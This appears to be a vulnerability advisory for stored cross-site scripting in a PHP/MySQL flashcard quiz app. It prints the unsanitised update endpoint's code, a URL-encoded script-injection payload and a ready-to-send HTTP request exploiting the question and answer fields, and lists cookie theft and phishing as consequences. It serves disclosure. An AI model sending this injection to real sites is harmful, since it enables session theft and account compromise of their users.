Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
Flashcard Quiz App Using PHP and MySQL 1.0
Affected Site Page:
/flashcard-quiz/endpoint/update-flashcard.php
Affected Code:
</update-flashcard.php>
There is no input sanitization present when updating flashcards, making the web application vulnerable to XSS.
<?php
include("../conn/conn.php");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['question'], $_POST['answer'])) {
$cardID = $_POST['tbl_card_id'];
$question = $_POST['question'];
$answer = $_POST['answer'];
try {
$stmt = $conn->prepare("UPDATE tbl_card SET question = :question, answer = :answer WHERE tbl_card_id = :tbl_card_id");
$stmt->bindParam(":tbl_card_id", $cardID, PDO::PARAM_STR);
$stmt->bindParam(":question", $question, PDO::PARAM_STR);
$stmt->bindParam(":answer", $answer, PDO::PARAM_STR);
$stmt->execute();
header("Location: http://localhost/flashcard-quiz/");
exit();
} catch (PDOException $e) {
echo "Error:" . $e->getMessage();
}
} else {
echo "
<script>
alert('Please fill in all fields!');
window.location.href = 'http://localhost/flashcard-quiz/';
</script>
";
}
}
?>Related CWE:
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Allows XSS by placing untrusted code on the parameters
questionandanswer.
Payload used is %3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3E for both parameters.
POST /flashcard-quiz/endpoint/update-flashcard.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
tbl_card_id=3&question=%3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3E&answer=%3Cscript%3Ealert%28%27reigz+was+here%27%29%3C%2Fscript%3EOnce the malicious script is injected, the attacker can perform a variety of malicious activities. The attacker could transfer private information, such as cookies that may include session information, from the victim's machine to the attacker. The attacker could send malicious requests to a web site on behalf of the victim, which could be especially dangerous to the site if the victim has administrator privileges to manage that site. Phishing attacks could be used to emulate trusted web sites and trick the victim into entering a password, allowing the attacker to compromise the victim's account on that web site. Finally, the script could exploit a vulnerability in the web browser itself possibly taking over the victim's machine, sometimes referred to as "drive-by hacking."
